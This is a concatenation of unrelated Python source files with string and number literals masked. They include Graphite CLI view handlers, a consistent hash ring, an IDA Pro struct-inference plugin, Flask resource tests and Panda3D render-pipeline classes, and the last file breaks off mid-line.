STORAGE_DIR + '<STR_LIT>' ) <EOL> wspIndex = open ( settings . STORAGE_DIR + '<STR_LIT>' ) <EOL> for line in chain ( wspIndex , rrdIndex ) : <EOL> if r . search ( line ) : <EOL> found += <NUM_LIT:1> <EOL> if found <= displayMax : <EOL> out += line . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) <EOL> if found >= displayMax : <EOL> out += '<STR_LIT>' % ( displayMax , found ) <EOL> else : <EOL> out += '<STR_LIT>' % found <EOL> return stdout ( out ) <EOL> def _save ( request , view ) : <EOL> if not settings . ALLOW_ANONYMOUS_CLI and not request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % view <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _dosave ( request , viewName ) : <EOL> profile = getProfile ( request ) <EOL> log . info ( "<STR_LIT>" % ( viewName , profile . user . username ) ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> view = View ( profile = profile , name = viewName ) <EOL> view . save ( ) <EOL> view . window_set . all ( ) . delete ( ) <EOL> for windowName , encodedString in request . GET . items ( ) : <EOL> try : <EOL> if windowName in ( '<STR_LIT:_>' , '<STR_LIT>' ) : continue <EOL> paramString = urllib . unquote_plus ( encodedString ) <EOL> queryParams = cgi . parse_qs ( paramString ) <EOL> modelParams = { } <EOL> for key , value in queryParams . 
items ( ) : <EOL> key = str ( key ) <EOL> value = str ( value [ <NUM_LIT:0> ] ) <EOL> if key in ( '<STR_LIT>' , '<STR_LIT:left>' ) : <EOL> value = int ( float ( value . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> if key in ( '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> value = int ( float ( value ) ) <EOL> modelParams [ key ] = value <EOL> if '<STR_LIT>' not in modelParams : <EOL> modelParams [ '<STR_LIT>' ] = None <EOL> win = Window ( view = view , name = windowName , ** modelParams ) <EOL> win . save ( ) <EOL> except : <EOL> log . exception ( "<STR_LIT>" % windowName ) <EOL> return stdout ( '<STR_LIT>' % viewName ) <EOL> def _load ( request , viewName , above = None ) : <EOL> if above : <EOL> out = stdout ( "<STR_LIT>" % viewName ) <EOL> else : <EOL> out = stdout ( "<STR_LIT>" % viewName ) <EOL> profile = getProfile ( request ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % viewName ) <EOL> if not above : <EOL> out += "<STR_LIT>" <EOL> for window in view . window_set . all ( ) : <EOL> out += _create ( request , window . name ) <EOL> out += "<STR_LIT>" % window . name <EOL> out += "<STR_LIT>" % ( window . name , window . url ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( window . top , window . left ) <EOL> out += "<STR_LIT>" % ( window . width , window . height ) <EOL> if window . interval : <EOL> out += "<STR_LIT>" % ( window . name , window . interval ) <EOL> out += "<STR_LIT>" % ( ( window . 
name , ) * <NUM_LIT:3> ) <EOL> return out <EOL> def _gsave ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> out = "<STR_LIT>" % graphName <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % graphName <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _dogsave ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> url = request . GET . get ( '<STR_LIT:url>' ) <EOL> if not url : return stderr ( "<STR_LIT>" ) <EOL> try : <EOL> existingGraph = profile . mygraph_set . get ( name = graphName ) <EOL> existingGraph . url = url <EOL> existingGraph . save ( ) <EOL> except ObjectDoesNotExist : <EOL> try : <EOL> newGraph = MyGraph ( profile = profile , name = graphName , url = url ) <EOL> newGraph . save ( ) <EOL> except : <EOL> log . exception ( "<STR_LIT>" % graphName ) <EOL> return stderr ( "<STR_LIT>" % graphName ) <EOL> return stdout ( "<STR_LIT>" % graphName ) <EOL> def _gload ( request , user = None , graphName = None ) : <EOL> if not user : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> profile = getProfileByUsername ( user ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> try : <EOL> myGraph = profile . mygraph_set . get ( name = graphName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = _create ( request , myGraph . name ) <EOL> out += "<STR_LIT>" % ( myGraph . name . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) , myGraph . 
url ) <EOL> return out <EOL> def _graphs ( request , user = None ) : <EOL> if not user : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> profile = getProfileByUsername ( user ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = "<STR_LIT>" <EOL> if user : <EOL> prefix = "<STR_LIT>" % user <EOL> else : <EOL> prefix = "<STR_LIT>" <EOL> for graph in profile . mygraph_set . all ( ) : <EOL> out += stdout ( prefix + graph . name ) <EOL> return out <EOL> def _views ( request ) : <EOL> out = '<STR_LIT>' <EOL> profile = getProfile ( request ) <EOL> for view in profile . view_set . all ( ) : <EOL> windowList = '<STR_LIT:U+002C>' . join ( [ window . name for window in view . window_set . all ( ) ] ) <EOL> out += stdout ( "<STR_LIT>" % ( view . name , windowList ) ) <EOL> return out <EOL> def _rmview ( request , viewName ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % viewName ) <EOL> view . delete ( ) <EOL> return stdout ( "<STR_LIT>" % viewName ) <EOL> def _rmgraph ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> try : <EOL> graph = profile . mygraph_set . get ( name = graphName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % graphName ) <EOL> graph . delete ( ) <EOL> return stdout ( "<STR_LIT>" % graphName ) <EOL> def _compose ( request , window ) : <EOL> out = "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" ; <EOL> out += "<STR_LIT>" <EOL> out += stdout ( '<STR_LIT>' ) <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _login ( request ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" % request . user . 
username ) <EOL> else : <EOL> return "<STR_LIT>" <EOL> def _logout ( request ) : <EOL> if not request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> return "<STR_LIT>" <EOL> def _id ( request ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return stdout ( "<STR_LIT>" % request . user . username ) <EOL> else : <EOL> return stdout ( "<STR_LIT>" ) <EOL> _whoami = _id </s>
<s> """<STR_LIT>""" <EOL> from graphite . logger import log <EOL> import time <EOL> try : <EOL> from hashlib import md5 <EOL> except ImportError : <EOL> from md5 import md5 <EOL> import bisect <EOL> def hashRequest ( request ) : <EOL> queryParams = [ "<STR_LIT>" % ( key , '<STR_LIT:&>' . join ( values ) ) <EOL> for ( key , values ) in request . GET . lists ( ) <EOL> if not key . startswith ( '<STR_LIT:_>' ) ] <EOL> normalizedParams = '<STR_LIT:U+002C>' . join ( sorted ( queryParams ) ) or '<STR_LIT>' <EOL> myHash = stripControlChars ( normalizedParams ) <EOL> return compactHash ( myHash ) <EOL> def hashData ( targets , startTime , endTime ) : <EOL> targetsString = '<STR_LIT:U+002C>' . join ( targets ) <EOL> startTimeString = startTime . strftime ( "<STR_LIT>" ) <EOL> endTimeString = endTime . strftime ( "<STR_LIT>" ) <EOL> myHash = targetsString + '<STR_LIT:@>' + startTimeString + '<STR_LIT::>' + endTimeString <EOL> myHash = stripControlChars ( myHash ) <EOL> return compactHash ( myHash ) <EOL> def stripControlChars ( string ) : <EOL> return filter ( lambda char : ord ( char ) >= <NUM_LIT> , string ) <EOL> def compactHash ( string ) : <EOL> hash = md5 ( ) <EOL> hash . update ( string ) <EOL> return hash . hexdigest ( ) <EOL> class ConsistentHashRing : <EOL> def __init__ ( self , nodes , replica_count = <NUM_LIT:100> ) : <EOL> self . ring = [ ] <EOL> self . replica_count = replica_count <EOL> for node in nodes : <EOL> self . add_node ( node ) <EOL> def compute_ring_position ( self , key ) : <EOL> big_hash = md5 ( str ( key ) ) . hexdigest ( ) <EOL> small_hash = int ( big_hash [ : <NUM_LIT:4> ] , <NUM_LIT:16> ) <EOL> return small_hash <EOL> def add_node ( self , key ) : <EOL> for i in range ( self . replica_count ) : <EOL> replica_key = "<STR_LIT>" % ( key , i ) <EOL> position = self . compute_ring_position ( replica_key ) <EOL> entry = ( position , key ) <EOL> bisect . insort ( self . ring , entry ) <EOL> def remove_node ( self , key ) : <EOL> self . 
ring = [ entry for entry in self . ring if entry [ <NUM_LIT:1> ] != key ] <EOL> def get_node ( self , key ) : <EOL> position = self . compute_ring_position ( key ) <EOL> search_entry = ( position , None ) <EOL> index = bisect . bisect_left ( self . ring , search_entry ) <EOL> index %= len ( self . ring ) <EOL> entry = self . ring [ index ] <EOL> return entry [ <NUM_LIT:1> ] </s>
<s> import idaapi <EOL> import idc <EOL> import sark <EOL> def message ( * messages ) : <EOL> for msg in messages : <EOL> for line in msg . splitlines ( ) : <EOL> idaapi . msg ( "<STR_LIT>" . format ( line ) ) <EOL> class AutoStruct ( idaapi . plugin_t ) : <EOL> flags = idaapi . PLUGIN_PROC <EOL> comment = "<STR_LIT>" <EOL> help = "<STR_LIT>" <EOL> wanted_name = "<STR_LIT>" <EOL> wanted_hotkey = "<STR_LIT>" <EOL> def init ( self ) : <EOL> self . _prev_struct_name = "<STR_LIT>" <EOL> return idaapi . PLUGIN_KEEP <EOL> def term ( self ) : <EOL> pass <EOL> def run ( self , arg ) : <EOL> start , end = sark . get_selection ( ) <EOL> if not sark . structure . selection_has_offsets ( start , end ) : <EOL> message ( '<STR_LIT>' ) <EOL> idaapi . warning ( '<STR_LIT>' ) <EOL> return <EOL> struct_name = idc . AskStr ( self . _prev_struct_name , "<STR_LIT>" ) <EOL> if not struct_name : <EOL> message ( "<STR_LIT>" ) <EOL> return <EOL> self . _prev_struct_name = struct_name <EOL> common_reg = sark . structure . get_common_register ( start , end ) <EOL> reg_name = idc . AskStr ( common_reg , "<STR_LIT>" ) <EOL> if not reg_name : <EOL> message ( "<STR_LIT>" ) <EOL> return <EOL> try : <EOL> offsets , operands = sark . structure . infer_struct_offsets ( start , end , reg_name ) <EOL> except sark . exceptions . InvalidStructOffset : <EOL> message ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> return <EOL> except sark . exceptions . SarkInvalidRegisterName : <EOL> message ( "<STR_LIT>" . format ( reg_name ) ) <EOL> return <EOL> try : <EOL> sark . structure . create_struct_from_offsets ( struct_name , offsets ) <EOL> except sark . exceptions . SarkStructAlreadyExists : <EOL> yes_no_cancel = idc . AskYN ( idaapi . ASKBTN_NO , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if yes_no_cancel == idaapi . ASKBTN_CANCEL : <EOL> return <EOL> elif yes_no_cancel == idaapi . ASKBTN_YES : <EOL> sid = sark . structure . get_struct ( struct_name ) <EOL> sark . structure . 
set_struct_offsets ( offsets , sid ) <EOL> else : <EOL> pass <EOL> sark . structure . apply_struct ( start , end , reg_name , struct_name ) <EOL> def PLUGIN_ENTRY ( ) : <EOL> return AutoStruct ( ) </s>
<s> import collections <EOL> import itertools <EOL> import networkx as nx <EOL> from . code . function import functions , Function <EOL> from awesome . context import ignored <EOL> from . import exceptions <EOL> def lowest_common_ancestors ( G , targets ) : <EOL> common_ancestors = None <EOL> all_ancestors = set ( ) <EOL> for target in targets : <EOL> parents = set ( ) <EOL> q = collections . deque ( ) <EOL> q . append ( target ) <EOL> while q : <EOL> n = q . popleft ( ) <EOL> if n in parents : <EOL> continue <EOL> for p in G . predecessors_iter ( n ) : <EOL> q . append ( p ) <EOL> parents . add ( n ) <EOL> all_ancestors . update ( parents ) <EOL> if common_ancestors is None : <EOL> common_ancestors = parents <EOL> else : <EOL> common_ancestors &= parents <EOL> lowest_common = set ( ) <EOL> if common_ancestors is not None : <EOL> for p in common_ancestors : <EOL> if any ( child not in common_ancestors and child in all_ancestors for child in G . successors_iter ( p ) ) : <EOL> lowest_common . add ( p ) <EOL> return lowest_common <EOL> def _try_get_function_start ( ea ) : <EOL> with ignored ( exceptions . SarkNoFunction ) : <EOL> return Function ( ea ) . startEA <EOL> return ea <EOL> def get_idb_graph ( ) : <EOL> """<STR_LIT>""" <EOL> digraph = nx . DiGraph ( ) <EOL> for function in functions ( ) : <EOL> for xref in itertools . chain ( function . xrefs_from , function . xrefs_to ) : <EOL> frm = _try_get_function_start ( xref . frm ) <EOL> to = _try_get_function_start ( xref . to ) <EOL> digraph . add_edge ( frm , to ) <EOL> return digraph <EOL> def get_lca_graph ( G , targets , lca_sources = None ) : <EOL> if lca_sources is None : <EOL> lca_sources = lowest_common_ancestors ( G , targets ) <EOL> lca_graph = nx . DiGraph ( ) <EOL> for source in lca_sources : <EOL> for target in targets : <EOL> path = nx . shortest_path ( G , source , target ) <EOL> for frm , to in itertools . izip ( path [ : - <NUM_LIT:1> ] , path [ <NUM_LIT:1> : ] ) : <EOL> lca_graph . 
add_edge ( frm , to ) <EOL> return lca_graph </s>
<s> import importlib <EOL> from . exceptions import UnknownModuleError , UnknownCallableError <EOL> def determine_module ( func ) : <EOL> """<STR_LIT>""" <EOL> return func . __module__ <EOL> def determine_name ( func ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> return func . __name__ <EOL> elif hasattr ( func , '<STR_LIT>' ) : <EOL> return func . __class__ . __name__ <EOL> raise AttributeError ( "<STR_LIT>" . format ( <EOL> func <EOL> ) ) <EOL> def import_module ( module_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return importlib . import_module ( module_name ) <EOL> except ImportError as err : <EOL> raise UnknownModuleError ( str ( err ) ) <EOL> def import_attr ( module_name , attr_name ) : <EOL> """<STR_LIT>""" <EOL> module = import_module ( module_name ) <EOL> try : <EOL> return getattr ( module , attr_name ) <EOL> except AttributeError as err : <EOL> raise UnknownCallableError ( str ( err ) ) </s>
<s> from itty import * <EOL> @ error ( <NUM_LIT> ) <EOL> def my_great_500 ( request , exception ) : <EOL> html_output = """<STR_LIT>""" % exception <EOL> response = Response ( html_output , status = <NUM_LIT> ) <EOL> return response . send ( request . _start_response ) <EOL> @ get ( '<STR_LIT>' ) <EOL> def hello ( request ) : <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_404 ( request ) : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_500 ( request ) : <EOL> raise AppError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_other ( request ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_403 ( request ) : <EOL> raise Forbidden ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_redirect ( request ) : <EOL> raise Redirect ( '<STR_LIT>' ) <EOL> run_itty ( ) </s>
<s> class Authorization ( object ) : <EOL> """<STR_LIT>""" <EOL> def __get__ ( self , instance , owner ) : <EOL> """<STR_LIT>""" <EOL> self . resource_meta = instance <EOL> return self <EOL> def is_authorized ( self , request , object = None ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> class ReadOnlyAuthorization ( Authorization ) : <EOL> """<STR_LIT>""" <EOL> def is_authorized ( self , request , object = None ) : <EOL> """<STR_LIT>""" <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return True <EOL> else : <EOL> return False </s>
<s> import os <EOL> import sys <EOL> from os . path import abspath , dirname , join <EOL> from django . core . management import execute_manager <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> try : <EOL> import settings_core as settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> import unittest <EOL> import flask <EOL> from restless . fl import FlaskResource <EOL> from restless . utils import json <EOL> from . fakes import FakeHttpRequest <EOL> class FlTestResource ( FlaskResource ) : <EOL> fake_db = [ ] <EOL> def fake_init ( self ) : <EOL> self . __class__ . fake_db = [ <EOL> { "<STR_LIT:id>" : <NUM_LIT:2> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> { "<STR_LIT:id>" : <NUM_LIT:4> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> { "<STR_LIT:id>" : <NUM_LIT:5> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> ] <EOL> def list ( self ) : <EOL> return self . fake_db <EOL> def detail ( self , pk ) : <EOL> for item in self . fake_db : <EOL> if item [ '<STR_LIT:id>' ] == pk : <EOL> return item <EOL> def create ( self ) : <EOL> self . fake_db . append ( self . data ) <EOL> class FlaskResourceTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( FlaskResourceTestCase , self ) . setUp ( ) <EOL> self . res = FlTestResource ( ) <EOL> self . app = flask . Flask ( '<STR_LIT>' ) <EOL> self . app . config [ '<STR_LIT>' ] = True <EOL> self . res . fake_init ( ) <EOL> def test_as_list ( self ) : <EOL> list_endpoint = FlTestResource . as_list ( ) <EOL> flask . request = FakeHttpRequest ( '<STR_LIT:GET>' ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = list_endpoint ( ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . data . 
decode ( '<STR_LIT:utf-8>' ) ) , { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> } ) <EOL> def test_as_detail ( self ) : <EOL> detail_endpoint = FlTestResource . as_detail ( ) <EOL> flask . request = FakeHttpRequest ( '<STR_LIT:GET>' ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = detail_endpoint ( <NUM_LIT:4> ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . data . decode ( '<STR_LIT:utf-8>' ) ) , { <EOL> '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } ) <EOL> def test_is_debug ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> self . assertTrue ( self . res . is_debug ( ) ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> self . app . debug = False <EOL> self . assertFalse ( self . res . is_debug ( ) ) <EOL> def test_build_response ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = self . res . build_response ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . data . decode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) <EOL> def test_add_url_rules ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> FlTestResource . add_url_rules ( self . 
app , '<STR_LIT>' ) <EOL> rules = sorted ( [ rule . endpoint for rule in self . app . url_map . iter_rules ( ) ] ) <EOL> self . assertEqual ( len ( rules ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( rules [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rules [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> FlTestResource . add_url_rules ( self . app , '<STR_LIT>' , endpoint_prefix = '<STR_LIT>' ) <EOL> rules = sorted ( [ rule . endpoint for rule in self . app . url_map . iter_rules ( ) ] ) <EOL> self . assertEqual ( len ( rules ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( rules [ <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rules [ <NUM_LIT:4> ] , '<STR_LIT>' ) </s>
<s> def main ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import basic_container <EOL> class SwiftContainer ( basic_container . BasicContainer ) : <EOL> def __init__ ( self ) : <EOL> super ( self . __class__ , self ) . __init__ ( ) <EOL> self . image = "<STR_LIT>" <EOL> self . command = "<STR_LIT>" <EOL> self . file_extension = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from panda3d . core import CardMaker , Vec2 , GraphicsWindow <EOL> from rpcore . rpobject import RPObject <EOL> from rpcore . globals import Globals <EOL> from rpcore . loader import RPLoader <EOL> class PixelInspector ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pipeline ) : <EOL> RPObject . __init__ ( self ) <EOL> self . _pipeline = pipeline <EOL> self . _node = Globals . base . pixel2d . attach_new_node ( "<STR_LIT>" ) <EOL> self . _create_components ( ) <EOL> self . hide ( ) <EOL> def _create_components ( self ) : <EOL> """<STR_LIT>""" <EOL> card_maker = CardMaker ( "<STR_LIT>" ) <EOL> card_maker . set_frame ( - <NUM_LIT:200> , <NUM_LIT:200> , - <NUM_LIT> , <NUM_LIT> ) <EOL> self . _zoomer = self . _node . attach_new_node ( card_maker . generate ( ) ) <EOL> Globals . base . taskMgr . doMethodLater ( <EOL> <NUM_LIT:1.0> , self . _late_init , "<STR_LIT>" ) <EOL> Globals . base . accept ( "<STR_LIT:q>" , self . show ) <EOL> Globals . base . accept ( "<STR_LIT>" , self . hide ) <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _node . show ( ) <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _node . hide ( ) <EOL> def _late_init ( self , task ) : <EOL> """<STR_LIT>""" <EOL> scene_tex = self . _pipeline . stage_mgr . pipes [ "<STR_LIT>" ] <EOL> self . _zoomer . set_shader ( RPLoader . load_shader ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) <EOL> self . _zoomer . set_shader_input ( "<STR_LIT>" , scene_tex ) <EOL> return task . done <EOL> def update ( self ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( Globals . base . win , GraphicsWindow ) : <EOL> mouse = Globals . base . win . get_pointer ( <NUM_LIT:0> ) <EOL> if mouse . get_in_window ( ) : <EOL> pos = mouse . get_x ( ) , <NUM_LIT:1> , - mouse . get_y ( ) <EOL> rel_mouse_pos = Vec2 ( mouse . get_x ( ) , Globals . native_resolution . y - mouse . get_y ( ) ) <EOL> self . _node . set_pos ( pos ) <EOL> self . _zoomer . 
set_shader_input ( "<STR_LIT>" , rel_mouse_pos ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from rplibs . six . moves import range <EOL> from panda3d . core import LVecBase4i , LVecBase4 <EOL> class ShadowAtlas ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , size , tile_size = <NUM_LIT:32> ) : <EOL> self . _size = size <EOL> self . _tile_size = tile_size <EOL> self . _num_used_tiles = <NUM_LIT:0> <EOL> self . init_tiles ( ) <EOL> def init_tiles ( self ) : <EOL> self . _num_tiles = self . _size // self . _tile_size <EOL> def row ( ) : <EOL> return [ False for i in range ( self . _num_tiles ) ] <EOL> self . _flags = [ row ( ) for j in range ( self . _num_tiles ) ] <EOL> def get_num_used_tiles ( self ) : <EOL> return self . _num_used_tiles <EOL> num_used_tiles = property ( get_num_used_tiles ) <EOL> def get_coverage ( self ) : <EOL> return self . _num_used_tiles / float ( self . _num_tiles ** <NUM_LIT:2> ) <EOL> coverage = property ( get_coverage ) <EOL> def reserve_region ( self , x , y , w , h ) : <EOL> self . _num_used_tiles += w * h <EOL> for x_offset in range ( w ) : <EOL> for y_offset in range ( h ) : <EOL> self . _flags [ x + x_offset ] [ y + y_offset ] = True <EOL> def find_and_reserve_region ( self , tile_width , tile_height ) : <EOL> for x in range ( self . _num_tiles - tile_height + <NUM_LIT:1> ) : <EOL> for y in range ( self . _num_tiles - tile_width + <NUM_LIT:1> ) : <EOL> if self . region_is_free ( x , y , tile_width , tile_height ) : <EOL> self . reserve_region ( x , y , tile_width , tile_height ) <EOL> return LVecBase4i ( x , y , tile_width , tile_height ) <EOL> print ( "<STR_LIT>" , tile_width , "<STR_LIT:x>" , tile_height ) <EOL> return LVecBase4i ( - <NUM_LIT:1> ) <EOL> def free_region ( self , region ) : <EOL> self . _num_used_tiles -= region . z * region . w <EOL> for x in range ( region . z ) : <EOL> for y in range ( region . w ) : <EOL> self . _flags [ region . x + x ] [ region . 
y + y ] = False <EOL> def get_tile_size ( self ) : <EOL> return self . _tile_size <EOL> def region_is_free ( self , x , y , w , h ) : <EOL> for x_offset in range ( w ) : <EOL> for y_offset in range ( h ) : <EOL> if self . _flags [ x + x_offset ] [ y + y_offset ] : <EOL> return False <EOL> return True <EOL> def get_required_tiles ( self , resolution ) : <EOL> if resolution % self . _tile_size != <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> return resolution // self . _tile_size <EOL> def region_to_uv ( self , region ) : <EOL> flt = LVecBase4 ( region . x , region . y , region . z , region . w ) <EOL> return flt * ( self . _tile_size / self . _size ) </s>
<s> """<STR_LIT>""" <EOL> from rplibs . six import iteritems <EOL> from panda3d . core import PTAFloat , PTALVecBase3f , PTALMatrix4f , PTALVecBase2f <EOL> from panda3d . core import PTALVecBase4f , PTALMatrix3f , PTAInt , TypeRegistry , PTALVecBase2i <EOL> from rpcore . rpobject import RPObject <EOL> class SimpleInputBlock ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> RPObject . __init__ ( self ) <EOL> self . inputs = { } <EOL> self . name = name <EOL> def add_input ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . inputs [ name ] = value <EOL> def bind_to ( self , target ) : <EOL> """<STR_LIT>""" <EOL> for key , val in iteritems ( self . inputs ) : <EOL> target . set_shader_input ( self . name + "<STR_LIT:.>" + key , val ) <EOL> class GroupedInputBlock ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> UBO_BINDING_INDEX = <NUM_LIT:0> <EOL> PTA_MAPPINGS = { <EOL> PTAInt : "<STR_LIT:int>" , <EOL> PTAFloat : "<STR_LIT:float>" , <EOL> PTALVecBase2f : "<STR_LIT>" , <EOL> PTALVecBase2i : "<STR_LIT>" , <EOL> PTALVecBase3f : "<STR_LIT>" , <EOL> PTALVecBase4f : "<STR_LIT>" , <EOL> PTALMatrix3f : "<STR_LIT>" , <EOL> PTALMatrix4f : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> RPObject . __init__ ( self ) <EOL> self . ptas = { } <EOL> self . name = name <EOL> self . use_ubo = bool ( TypeRegistry . ptr ( ) . find_type ( "<STR_LIT>" ) ) <EOL> self . bind_id = GroupedInputBlock . UBO_BINDING_INDEX <EOL> GroupedInputBlock . UBO_BINDING_INDEX += <NUM_LIT:1> <EOL> if self . bind_id == <NUM_LIT:0> : <EOL> self . debug ( "<STR_LIT>" , self . use_ubo ) <EOL> def register_pta ( self , name , input_type ) : <EOL> """<STR_LIT>""" <EOL> self . ptas [ name ] = self . glsl_type_to_pta ( input_type ) . empty_array ( 